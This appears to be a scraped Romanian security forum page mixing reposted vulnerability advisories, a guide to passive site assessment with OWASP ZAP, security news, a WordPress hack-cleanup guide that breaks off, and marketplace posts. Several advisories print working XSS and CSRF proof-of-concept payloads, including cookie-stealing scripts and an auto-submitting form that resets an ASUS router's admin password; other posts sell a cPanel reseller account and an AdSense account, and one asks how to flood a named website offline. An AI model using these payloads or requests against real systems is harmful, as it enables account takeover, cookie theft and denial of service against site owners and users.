Search the Community

Fox eBook - eBooks Free Download Site Programare, matematica, finante si economie, gastronomie, politica... un site extraordinar ENJOY!

i like this site Free Premium Accounts | Daily Updates

########################### #Exploit Title: # Mobilis 3g mobiconnect 3G++ Stored XSS vulnerability #Date: 07/01/2015 #Author: kabanni kacily2008@gmail.com #Product web page: http://www.3G.dz/ http://www.mobilis.dz/ #Version Of software WEB_MOBILISDZMF667V1.0.0B03 #Version The firmware BD_HDW5MF667V1.0.0B01 #Version Equipment MF667-2.0.0 #Product & Service Introduction: http://www.zte.com.cn http://www.mobilis.dz/entreprises/mobiconnect.php http://www.3g.dz/fr/cle_mas/index.php?id_document=2 #Tested on: WifiSlax (Es) ########################### 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 1 ______ 0 0 .-" "-. 1 1 / HaChkerz_Dz \ =-=-=-=-=-=-=-=-=-=-=-=| 0 0 Algerian HaCker | | > Site : GDGBordj.org | 1 1 --------------- |, .-. .-. ,| > fb : @kabanni | 0 0 | )(_o/ \o_)( | > [email]kacily2008@gmail.com[/email]| 1 1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=-| 0 0 (@_ (_ ^^ _) 0X00 Team 1 1 _ ) \_______\__|IIIIII|__/_______________________ 0 0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1 1 )_/ \ / 0 0 (@ `--------` 2015, 0x00 Team 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 0 Mobilis 3g mobiconnect 3G++ XSS vulnerability 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 ########################## # Sample Payload for Stored XSS: "<script>alert(0);</script> " # Solution Filter the input fields aganist to XSS attacks. # code : GET /goform/goform_get_cmd_process?cmd=%3Cscript%3Ealert%28%27happy%20new%20year%27%29%3C/script%3E HTTP/1.1 Host: 192.168.0.1 Or [url]http://m.home[/url] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ls_google_allow=1; ls_iserver_timestamp_bnc_bsaved=1414677822551; ctx1420m06d05=7b2273756363657777723a302c226c6f675f616374697665223a307d Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive # Attack details : The variable cmd has been set to simple payload <script>alert('happy new year')</script> --==[[ Greetz To ]]==-- ############################################################################################ #0x00 , Alhack , Mr.elhdj Google , Hakim_Ghorb , Mohamed Ramaden , Team Anonymous . #Mr.Zaki ,Dr.Ben Taleb,unKnown ,Dahmani,Good_person ,Boud_Sah ,Moh_Dz ,Yass_assasine. #Amin-Biskra , Bouhlel ,Mr.Control, Najmo & All students TIC & Informatics at Msila_Msila #############################################################################################

Salut,vand un cont de cpanel reseller care contine si un site destul de bun: x 60.000 vizitatori unici/zi x Trafic de Egypt/Saudi Arabia Pretul este 200 Usd Bitcoin sau PM Nu pun site-ul aici,il dau doar prin mesaj privat,persoanelor de incredere. Pot oferi dovada ca am access la site,pot oferi print screen din AwStats,pentru a demonstra vizitatorii etc.

Title: XSS Nokia.com PoC : Status: Raported References: Cross Site Scripting: OWASP Author: sleed

Site-ul Filme-OnlineHD ofera filme de calitate subtitrate in limba Romana. Reclamele de tip pop-up afisate pe site provin de la playere, nu este vina noastra. Mai multe informatii pe - http://filme-onlinehd.com/reclame/ Site: http://filme-onlinehd.com/

Hello list! There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities in ASUS Wireless Router RT-G32. ------------------------- Affected products: ------------------------- Vulnerable is the next model: ASUS RT-G32 with different versions of firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2. ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27 http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27 These vulnerabilities work as via GET, as via POST (work even without authorization). ASUS RT-G32 XSS-1.html <html> <head> <title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="next_page" value="'+alert(document.cookie)+'"> <input type="hidden" name="group_id" value="'+alert(document.cookie)+'"> <input type="hidden" name="action_script" value="'+alert(document.cookie)+'"> <input type="hidden" name="flag" value="'+alert(document.cookie)+'"> </form> </body> </html> Cross-Site Request Forgery (WASC-09): CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth). ASUS RT-G32 CSRF-1.html <html> <head> <title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="http_passwd" value="admin"> <input type="hidden" name="http_passwd2" value="admin"> <input type="hidden" name="v_password2" value="admin"> <input type="hidden" name="action_mode" value="+Apply+"> </form> </body> </html> I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source

nu am vazut sa mai fi fost postat pe forum si pentru mine arata interesant: [INDENT]A website that irrevocably deletes itself once indexed by Google. [/INDENT] [COLOR=#333333][FONT=Helvetica Neue]The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site, these contributions will also be destroyed when the site deletes itself.[/FONT][/COLOR] https://github.com/mroth/unindexed

cum spune si titlul am nevoie de cineva sa imi faca un site gen dateprofits.com cine e interesat si crede ca poate sa faca un site de genul astept pm. buget 3000$ pentru mai multe detalii astept pm. o saptamana placuta sa aveti.

unindexed A website that irrevocably deletes itself once indexed by Google. The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site, these contributions will also be destroyed when the site deletes itself. Why would you do such a thing? The full explanation is in the content of the site (which is not linked anywhere here). UPDATE: The experiment lasted 22 days before it was indexed by Google on 24 February 2015 at 21:01:14 and instantaneously destroyed. It was primarily shared via physical means in the real world, word of mouth, etc. If you didn't find it before it went away. If you want to conduct your own similar experiment, the source code is here. info Nothing has been done to prevent the site from being indexed, however the NOARCHIVE meta tag is specified which prevents the Googles from caching their own copy of the content. The content for this site is stored in memory only (via Redis) and is loaded in via a file from an encrypted partition on my personal laptop. This partition is then destroyed immediately after launching the site. Redis backups are disabled. The content is flushed from memory once the site detects that it has been indexed. The URL of the site can be algorithmically generated and is configured via environment variable, so this source code can be made public without disclosing the location of the site to bots. Visitors can leave comments on the site while it is active. These comments are similarly flushed along with the rest of the content upon index event, making them equally ephemeral. other Sample configuration notes for running on Heroku: $ heroku create `pwgen -AnB 6 1` # generates a random hostname $ heroku addons:add rediscloud # default free tier disables backups $ heroku config:set REDIS_URL=`heroku config:get REDISCLOUD_URL` $ heroku config:set SITE_URL=`heroku domains | sed -ne "2,2p;2q"` $ git push heroku master $ heroku run npm run reset $ heroku addons:add scheduler:standard $ heroku addons:open scheduler Schedule a task every N minutes for npm run-script query (unfortunately seems like this can only be done via web interface). Use scripts/load_content.js to load the content piped from STDIN. You can configure monitoring to check the /status endpoint for "OK" if you trust an external service with your URL. Link: https://github.com/mroth/unindexed

Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Ultimate PHP Board (UPB) version 2.2.7 suffers from a cross site scripting vulnerability. # Exploit Title : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability # CVE : CVE-2015-2217 # Date : 4 March 2015 # Exploit Author : CWH Underground # Discovered By : ZeQ3uL # Site : www.2600.in.th # Vendor Homepage : http://www.myupb.com # Software Link : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip # Version : 2.2.7 ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' #################### SOFTWARE DESCRIPTION #################### Ultimate PHP Board is completely text based making it easy for anybody who has access to PHP can run a message board of their own without the need for MySQL. #################################### DESCRIPTION FOR CROSS SITE SCRIPTING #################################### myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. myUPB 2.2.7 is vulnerable; other versions may also be affected. #################### VULNERABILITY DETAIL #################### 1. Reflect Cross Site Scripting (search.php) POC: /search.php?q='><script>alert(1)</script> 2. Stored Cross Site Scripting (profile.php) POC: POST /upb/profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/upb/profile.php Cookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------287611866431947 Content-Length: 716 -----------------------------287611866431947 Content-Disposition: form-data; name="u_email" t@t.com -----------------------------287611866431947 Content-Disposition: form-data; name="u_loca" th -----------------------------287611866431947 Content-Disposition: form-data; name="avatar" images/avatars/chic.jpg'><script>alert("hacked");</script> -----------------------------287611866431947 Content-Disposition: form-data; name="u_site" http:// -----------------------------287611866431947 Content-Disposition: form-data; name="u_timezone" 0 -----------------------------287611866431947 Content-Disposition: form-data; name="u_edit" Submit -----------------------------287611866431947-- ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ Source

Salut rst mi-a zis un prieten cum pot face si eu 5$ pe zi , stau doar 3-4 ore maxim sa fac atat , daca stati mai mult puteti face si mai mult. Este un site unde pot da like-uri la pagini pe facebook, la comentarii, google +1, vizionari pe yt si multe altele. Acesta este site cu ref meu: Free Facebook Likes - Facebook Like Exchange - Like4.us si fara ref Home - Like4.us . Eu am transferat ieri 5 euro facuti !

Google yesterday announced that it would expand its browser security efforts with a new warning in Chrome about unwanted software to caution users about accessing sites that are known to encourage unsafe downloads. The Mountain View, Calif., search and browsing giant has invested serious resources into its safe browsing features over the past several years. The company revamped its malware and bad SSL certificate warnings last year following a pair of studies seeking to determine how browser-based warnings could effectively stop users from clicking through to potentially dangerous content. To this point, a user would trigger Google’s unwanted software warning in Chrome just as he attempted to download sketchy content. Now the warnings kick in as the user attempts to browser directly to a site or in Google search results leading to the site. “If you’re a site owner, we recommend that you register your site with Google Webmaster Tools,” wrote Google software engineer, Lucas Ballard. “This will help you stay informed when we find something on your site that leads people to download unwanted software, and will provide you with helpful tips to resolve such issues.” Early last year, Google ruffled some feathers by announcing it would block malicious file downloads by default in its Chrome browser. While some expressed concern about Google acting as a gatekeeper for acceptable content, the company ultimately went forward with the move. Yesterday’s announcement takes Google’s year-old decision one step further, allowing the company to encourage users not to visit certain sites as opposed to encouraging them not to download certain files. Later in 2014, the company expanded its definition of unwanted software to include programs that purport to be something they are not or make unwanted changes to the user’s browser. Source

How To Assess a Third Party Web Site or Cloud Service with the OWASP ZAP Attack Proxy When You Don’t Have Permission to Pentest As a security professional, you will often be asked to give your opinion or assessment on the security of a third-party web site or cloud service. The person asking the question will usually have no authority to give you permission to run a penetration test on the remote site, and the chances that you can secure permission from the remote site’s owner will also be remote. If this happens to you, are you stuck? Actually, the answer is no. There is plenty of reconnaissance you can perform on a third-party service without requesting special permission, as long as you have a solid attack proxy and a plan. Introducing the OWASP ZAP Attack Proxy One of the top free tools in application security and pentester toolboxes these days is the OWASP ZAP attack proxy. (“ZAP” stands for “Zed Attack Proxy.”) In pentest mode, this tool can map a site, attempt exploits and fuzz input, but using these capabilities against a third-party site without the owner’s permission can be an invitation for trouble. Fortunately, third-party site owners usually grant permission during trial and demo periods to try out their site and service using normal web browsers and mobile devices. The trick to good (and legal) reconnaissance is to only capture and analyze the traffic available in the trial period, and this happens to be another application at which OWASP ZAP excels. Setting Expectations and Getting Internal Permission Before you do anything technical, however, you should set expectations and get some cover from the person who requested the assessment. In the process of doing this, you will also lay out your plan, request access to a demo account, and explicitly tell the requester what you are not going to do (i.e., “hack” or run a “pentest”). After you do more of these evaluations you will surely develop your own template, but the following message will get you started: For your own protection, please do NOT begin your research until you get: A positive acknowledgment to your “Is this OK?” question in writing. A working demo account, which you have tested using a regular Web browser. Planning Your Reconnaissance If you don’t get to hack, what can you do? Actually, the list of items you can investigate from normal traffic is often long enough to make a judgment call on the security posture of the target service. In this article we’ll cover “just” nine, but you could certainly look at many more. Use of HTTPS to protect traffic Quality of SSL certificate Avoids client-side secrets or authentication Up-to-date software Secure site headers Proper location and protection of vital assets Avoids information leakage through “extra” fields Access controls on web APIs (sometimes) Evaluation of legal and privacy policy Preparing OWASP ZAP and Your Browser To use OWASP ZAP in a noninvasive, passthrough mode, you need to set ZAP up as a proxy. From ZAP’s main menu, select “Tools | Options”. In the “Local Proxy” section, set the address and port your browser will use (The defaults are an address of “localhost” and a port “8080”). In the “Dynamic SSL” section, click the “Generate” button to create a CA certificate to use to facilitate your HTTPS connections. Still in the “Dynamic SSL” section, click the “Save” button to save a copy of this CA certificate as a *.cer file (You will want to import this CA into your browser soon to avoid “untrusted SSL certificate” blocks). Pick the Web browser you want to use to examine the remote site. Since I use Chrome for my daily browsing, I usually use Firefox as my secondary browser for Web analysis. Open your selected Web browser and set up its proxy settings, located here in current versions of Firefox (“Options” dialog, “Network” tab, “Connection” section, “Settings” button): …IE (“Settings” icon, “Internet Options” option, “Connections” tab, “LAN Settings” button) …and Chrome (“Settings” dialog, “Slow advanced settings…” link, “Network” section, “Change proxy settings…” button, then see “IE” entry above because it uses the same “Internet Properties” dialog as IE). Once you have configured your proxy, you should also import the proxy’s SSL CA certificate so your browser will not warn you about a bad certificate (the proxy’s certificate) every time you contact an HTTPS server. In Firefox, the list of trusted CA certificates is available from the “Certificates” tab in the program options. In IE and Chrome, the list of trusted CA certificates is also available through each browser’s options, but is actually saved in the local Windows operating system, not the browser itself. To test all this, restart your selected browser, make sure OWASP ZAP is running, and contact an HTTPS-protected site like https://www.google.com. You may immediately see a certificate warning page like this: …because the certificate presented by the proxy does not match the target, but you should have an option to “Add Exception” or “Proceed” because you already added the proxy’s certificate to your list of trusted CAs (E.g., you get a yellow warning you can ignore instead of a red error that stops you from proceeding). To proceed, click the available link and inspect the provided certificate. If you performed your steps correctly you will “OWASP” all over it. Click the “Permanently store this exception” box and then click the “Confirm Security Exception” button (or similar controls) to dismiss the error and proceed with your connections. Bypassing the Proxy for Certain Sites As you perform research on various sites, you may also want to set up a list of sites that will not be queried through the proxy. These settings are usually near your browser’s other proxy settings. For example, in Firefox, they are immediately below the proxy host and port settings. Performing Your Reconnaissance Now that you have OWASP ZAP and your browser set up, let’s proceed with some reconnaissance. Our sample target today will be a web services company called EventMobi, which hosts a public demo at MFG 2015. (Remember, we’re being non-invasive, so public resources are best!) Use of HTTPS to protect traffic To get started, simply open up the public demo link in your browser. (Do NOT enter it into the inviting little “URL to attack” field in OWASP ZAP!) Since we’re going through a proxy that may tie things up, you may need to refresh your browser (or perform the “Resolving Missing Images” procedure below) a few times to get all the content you want, but in less than a minute you should see a valid web page in your browser: …and some folders will start to appear in ZAP under the “Sites” list. Notice that pages are already listed as coming from “http” or “https.” In the case of our sample site, it’s clear that all content is being served from http, and that we haven’t been pushed to https automatically. To research this further and see if https is an option if we want secure transport, we can go back to the browser and simply change the main URL from MFG 2015 to https://eventmobi.com/mfg2015/attendees/76204. In this case, the site doesn’t load (there is an eternally spinning “loading” circle), so we switch to a “normal” browser (not going through the proxy) to confirm the lack of HTTP support. Since the behavior is the same with our proxied and normal browsers, we reach an unfortunate conclusion: this site doesn’t use HTTPS by default, and won’t support HTTPS if we ask for it. Resolving Missing Images To resolve images and other resources that come from other sites, you may need to perform the following procedure, especially if they are being served from HTTPS resources. Right-click the non-resolving resource (such as an image) and right-click “Copy Image Location” (or similar). In a new tab, paste the URL from the previous step. Click through any certificate resolution or other site-specific errors until the specific resource resolves. Go back to the tab with the main application and refresh it to resolve all resources from the same site. Assessment of Sample Site For “use of HTTPS to protect traffic,” we conclude that this site is weak because it doesn’t use HTTPS by default, and won’t support HTTPS if we ask for it. Quality of SSL certificate While we’re on the subject of HTTPS, we should step out out of our proxied browser again and inspect the real X.509 certificate being offered up by our target site. We can usually do this by clicking the lock or certificate icon near our page URL. Here is what that looks like in Chrome (my daily, non-proxy browser). To get even more information, click “Certificate information.” There are generally three things you want to look for here. First, make sure that there is a fully trusted path to a legitimate CA. This certificate is in good shape. Next, check the “CN” on the certificate (usually in the “Subject” field). In this case, the certificate looks like a “wildcard” certificate because the CN is for the entire domain rather than a specific server. This is often a good sign, because wildcard certificates indicate that a company is large or stable enough to spend the extra money on a site-wide certificate. Finally, take a look through the other fields on the certificate. In this case, there is an interesting list of what appears to be customer-specific sites in the “Subject Alternative Field.” If you plan on using your own domain name through the provider, having this list broadcast to anyone who connected to the provider’s Web site might or might not make you nervous. Assessment of Sample Site For “quality of SSL certificate” we conclude that this site is OK because it uses a valid X.509 certificate, but could be better since the certificate seems to be leaking the URLs of some other customer sites. Avoids client-side secrets or authentication Now that we’re done with SSL and certificates, let’s look at the application itself. To see how it works, click throughout the application in your proxied browser. (In other words, try to go everywhere you can through links, buttons and forms.) Once you have a nice set of data, return to the ZAP console and open the tree that corresponds to our target site (in this case, “http://evenmobi.com“). Then drill down into a particular request and click the “Response” tab to see what the target site is telling us. What we are mostly looking for here is JavaScript or other client code that is performing authentication requests, especially passwords accidentally sent to the client. (To help detangle hard-to-read JavaScript, remember to use a JavaScript Beautifier.) Our target site has a lot of its resources in a “webapp/view/high/js” tree, so we can drill down there to look at individual files. Another place to look for potential exposure is the history of requests at the bottom of the ZAP console. In this case, ZAP has highlighted a “*.js” file that contains the word “password” and warrants further inspection. A complete analysis of client code, authentication routines and unsafe password handling is beyond this article (and could take more time than the rest of the steps combined), but suffice it to say that our target site passed its inspection. Assessment of Sample Site For “avoids client-side secrets or authentication” we conclude that this site is fine because it doesn’t do client-side authentication and keeps its passwords safe on the server. Up-to-date software Most Web sites depend on a variety of third-party libraries and applications, and many sites lag behind the most current and secure versions of these components. This problem is so widespread that OWASP continues to track it as #9 in its Top Ten Web Vulnerabilities. Fortunately ZAP can help us look for these in three ways. First, we can look at Web site headers for Web software version numbers. Unless it’s suppressed by the target server or intervening firewall, this information will be displayed in any content response from the site. In this case we see that the site is claiming to run version 1.1.19 of the nginx Web server. Checking the nginx release history, we see that that version was released in April 2012 – almost three years ago. We can also look up nginx security vulnerabilities to see that our target server may have a number of “medium” severity vulnerabilities (fortunately no “major” vulnerabilities), including: SSL session reuse vulnerability Request line parsing vulnerability Memory disclosure with specially crafted HTTP backend responses Vulnerabilities with Windows directory aliases Second, we can use ZAP to look for application environment versions. These may be displayed if we access “Web application” files like *.php, *.aspx, etc. (Hiding this information is a best practice, so it may not appear on all sites.) n this case we see that the remote site is running PHP version 5.3.10, and is also probably running Ubuntu with a Linux kernel version of 3.15. That suggests that the operating system was updated at least once in the past year (OK), but that the PHP environment has been deprecated (all support, including security support, terminated in mid-2014). Finally, we can also use ZAP to check standardized JavaScript libraries and other includes for vulnerable versions. These may be easy to find in the list of downloaded assets: …or may be buried in inline page includes (which requires looking through downloaded content). In this case, we can check at least three standard libraries for known vulnerabilities: socket.io (version 0.9.11) – current version is 1.3.3; this version appears safe jquery (version 1.7) – current version is 1.9; this version appears safe keen (version 2.1.0) – current version is 3.2.2; this version appears safe etc… Assessment of Sample Site For “up-to-date software” we conclude that this site is worrisome because it is running a pretty old version of its Web server software with several known vulnerabilities and an out-of-support version of PHP. (The application JavaScript components appear fine, but the Web server and PHP issues are enough to cause concern.) Secure site headers A sign that a service takes security seriously is the use of special Web site headers designed to prevent XSS and related exploits. Many of these headers are detailed on other sites, but some of the best ones to look for are: X-Frame-Options: SAMEORIGIN or X-Frame-Options: DENY X-Content-Type-Options: nosniff (Missing) X-Powered-By… Strict-Transport-Security Content-Security-Policy Using ZAP, these would show up in the Response section of most file requests. Unfortunately, none of the secure headers we would like to see are used by our target site, and as we saw above, the target site quite happily uses an “X-Powered-By” header to tell us about the underlying application (PHP) and OS (Ubuntu Linux) environment. Assessment of Sample Site Our target site does not use any “secure site headers,” and does not suppress headers that may provide helpful information to hackers. Proper location and protection of vital assets One of the many things ZAP does well is organize detected assets by site of origin. This makes it easy to see where a target site stores its assets and runs its application. In the case of our target site we can see resources come from newrelic.com, linkedin.com, amazonaws.com and google-analytics.com, among other places. For now we will ignore the tracking and advertising sites and zero in on resources pulled from Amazon’s S3 storage service. To see these, open up the related tree until you can drill down to an asset. Notice that the full URL of each asset is available in ZAP. To see whether or not an asset is accessible without any access control, copy its URL into an “incognito” browser window in a non-proxy browser. (ZAP provides a right-click “Copy URLs to Clipboard” option for this exact purpose.) If you can pull up the resource in a fresh, incognito browser session, there is generally no access protection and anyone with the URL to the resource can access it. In some cases this is OK, but if confidential information is ever accessible in this way you could have a leak on your hands. Assessment of Sample Site In terms of “proper location and protection of vital assets” there are a number of company-specific assets that are stored on publicly-accessible storage at Amazon. Since all the information we plan to store in this application is public anyway, this is OK, but we would need to see a different storage mechanism in place with enforced access controls if we planned to use the service with any confidential information. Avoids information leakage through “extra” fields It is common for Web applications, particularly Web services, to provide “extra” information with requests that client-side (usually JavaScript) code will filter out. However, all this information is easily accessible to interested parties, including you. To look for this type of information using ZAP, look for large page or Web service requests in your history, then dig into the fields provided. Remember to cut/paste data in JSON prettifiers and other tools if you need help visualizing it. For example, here is an abbreviated response from our sample site: { "response":{ "id":"76204", "name":"Attendees", "items":[ { "id":"1812359", "first_name":"James Avery", "about":"", "image50":"50mfg-m-01.jpg", "image100":"100mfg-m-01.jpg", "title":"Support Specialist", "company_name":"Metropolitan Financial Group", "website":"http://www.eventmobi.com", "facebook":"http://www.facebook.com/eventmobi.com", "twitter":"http://twitter.com/eventmobi", "linkedin":"http://www.linkedin.com/in/eventmobi", "url":"http://api.eventmobi.com/en/api/v1/events/MFG2015/sections/76204/items/1812359" }, { "id":"1812360", "first_name":"Joe Baker", "about":"", "image50":"50crop_547c946dd931f_128_(1).jpg", "image100":"100crop_547c946dd931f_128_(1).jpg", "title":"CEO", "company_name":"Metropolitan Financial Group", "website":"http://www.eventmobi.com", "facebook":"http://www.facebook.com/eventmobi.com", "twitter":"http://twitter.com/eventmobi", "linkedin":"http://www.linkedin.com/in/eventmobi", "url":"http://api.eventmobi.com/en/api/v1/events/MFG2015/sections/76204/items/1812360" }, This is a block of JSON that shows that the target site will happily dump a complete attendee list, including self-provided contact information. Assessment of Sample Site In terms of “Avoids information leakage through “extra” fields” the target site is OK. Although interesting fields such as “linkedin” are revealed, they must be added by individual users and are probably easy to find through other publicly available sources. Access controls on web APIs After you have identified a few key API service calls in ZAP, copy the URLs out and try them in your incognito Web browser to see if they are protected by any access controls. In the case of our sample site, there do not appear to be any access controls on the API. Assessment of Sample Site In terms of “access controls on Web APIs” there do not appear to be any access controls. This may be OK for public information, but if information such as lists of attendees is sensitive, then we may be concerned. Evaluation of legal and privacy policy Finally, you can put ZAP down for a minute and read some legalese. Go back to the target site using a non-proxy Web browser and find its legal terms, privacy or security policy. For our target site, a privacy policy can be found at http://www.eventmobi.com/legal/privacy-policy/ At a high level, you are looking for promises of privacy or security made in the legal policy that do not seem to be backed up with technical controls. As it turns out, our target’s privacy policy is weak, but accurately describes what they do or do not do. In a section about the type of information collected and its use, our target accurately lists what they collect and states that the information of participants is “publicly available online” (as we saw while looking at Web service access controls). In the “Security” section we see a statement about “suitable procedures” to protect information collected online. This is vague enough to encompass what we saw in our investigation (e.g., no encryption for public information), but without more inspection we have to take our target on its word. Finally, another “Security” section contains a vague promise of “security measures,” and then honestly puts the onus of not posting anything confidential on the users. Assessment of Sample Site Our “evaluation of legal and privacy policy” did not give us great confidence in the security of the site, but it agrees with our overall technical assessment. For that reason, it strikes us as an honest policy. Filing Your Report Now that you have completed your analysis, it’s time to provide a recommendation based on your limited information. Remember that your requester is primarily looking for a simple answer to this question: “Is this service safe enough for the job?” A typical results report might resemble the following template. For example, an evaluation of our sample target might yield the following report. Source

Salut baieti. Imi cer scuze daca nu am postat unde trebuie. Am avut mai multe site uri pe care am folosit un cont Adsense. Ca vechime, el are in jur de patru ani iar ultima plata de la google a fost anul trecut, in aprilie. Acum am renuntat la site uri si momentan in cont sunt in jur de 35 de euro. Pe cei interesati ii rog sa mi faca o oferta prin PM. Multumesc.

# Exploit Title: Wordpress Media Cleaner - XSS # Author: ?smail SAYGILI # Web Site: www.ismailsaygili.com.tr # E-Mail: iletisim@ismailsaygili.com.tr # Date: 2015-02-26 # Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip # Version: 2.2.6 # Vulnerable File(s): [+] wp-media-cleaner.php # Vulnerable Code(s): [+] 647. Line $view = $_GET['view'] : "issues"; [+] 648. Line $paged = $_GET['paged'] : 1; [+] 653. Line $s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null; # Request Method(s): [+] GET # Vulnerable Parameter(s): [+] view, paged, s # Proof of Concept --> http://target.com/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view={XSS}&paged={XSS}&s={XSS} --> http://localhost/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view="><img src=i onerror=prompt(/xss/)>&paged="><img src=i onerror=prompt(document.cookie)>&s="><img src=i onerror=prompt(/XSS/)> Source

Salut lume, As vrea si eu sa floodez sau sa fac cumva sa dau jos acest site (Videochat in Iasi), cel putin o perioada scurta de timp. Credeti ca se poate ?

Salut Am un site si vreau sa implementez plata prin sms. Problema e ca majoritatea siteurilor de plati prin sms accepta doar persoane juridice si pfa. Stie careva vre-un site care accepta platile prin sms fara a avea nevoie de pfa sau firma?

Salut, cumpar site de filme online cu minim de vizitatori 1000/zi din google. Fac afacerea doar cu utilizatori cu rep / vechime pe forum / recomandare din partea unui mod sau admin.

Salut prieteni! Am gasit astazi un site care organizeaza giveaway-uri regulat. Pas 1. Intrati pe site : Earn your Steam games for free on Steamgameswap - sGs (reff) Pas 2. Dati Sign in with steam Pas 3.Intrati aici (fara reff) Earn your Steam games for free on Steamgameswap - sGs - Giveaway si aici Earn your Steam games for free on Steamgameswap - sGs - Opiumpulses si va inscrieti la toate. Spor la castigat jocuri prieteni

WordPress is the most popular CMS (Content Management System) available nowadays online, used by the vast majority of all sites. If you have a look at this report, WordPress holds the lion share (60.6%) of the sites whose CMS we know and a total of 23.4% of all sites. It is easy to use and it offers great flexibility, with both ready and custom templates and a plethora of plugins to put into effect. Moreover, WordPress provides its users with the opportunity to enhance the SEO-friendly (and thus Google-friendly) nature of their site pretty smoothly and it also offers mobile-friendly themes. These are some of the major reasons why WordPress has been characterized as one of the most successful CMS options to date, and this is why it is the number one choice for many web designers, developers, tech freaks and even novices and tech-illiterate people who seek to find a simple yet effective tool for creating their site. Due to its exponential growth and its universal popularity, WordPress is not immune to threats and hacking attempts. It is true that the more popular something is, the more likely it will be for others to seek compromising it in the long run. This is why it is not that rare a phenomenon to hear about WordPress sites having been hacked and not being able to function properly. Before we continue with our guide about cleaning up WordPress, it is important that we truly understand what website hacking is and what this can do to your site and your computer. What Website Hacking is, and How it Affects You There are two major types of website hacking that you should beware of, in order to ensure that you offer the best user experience to every single visitor and not compromise his or her overall security: The first type has to do with the establishment of a backdoor; this means that the hacker leaves room for returning to your site whenever he feels like it and gaining access to places that should be out of reach for him. The difficulty in tracing this type of website hacking lies in the fact that this backdoor is not visible to the naked eye – and thus it can go unnoticed for a truly long time. The second type involves the deterioration of user experience and the compromise of your site directly from the source. The visitors that click on your site can be redirected to other sites or get pop-ups on their screen as soon as they head to your home page. In addition, malware can be installed silently to the computers of your site’s visitors, and of course this is never a good thing. Now that we have comprehended what goes on in cases of WordPress sites being hacked, and before moving on to the process of WordPress database cleanup, it is time to highlight the signs that should alarm you that something is wrong with your site. Signs that Reveal a Potential WordPress Hack Even though the signs are not a perfect match to every single WordPress site that has been compromised, they offer some truly helpful information that should get you on your feet and urge you to dig deeper and see whether or not your site has indeed been hacked. Let’s see these signs in the form of bullets: Problems with e-mails: The hackers will start sending e-mails from your site, and you will most probably be blocked as spam mailer. This can affect your communication with others, as you will not even have a clue about your e-mail activity. Bad content added to WP: You cannot control what content is added to your site, and this is in fact one of the major factors that ought to urge you to start cleaning up the mess. Slow performance or crash: This is another indicator that you are in need of WordPress clean up after a hack. If you are experiencing too slow performance or if you see 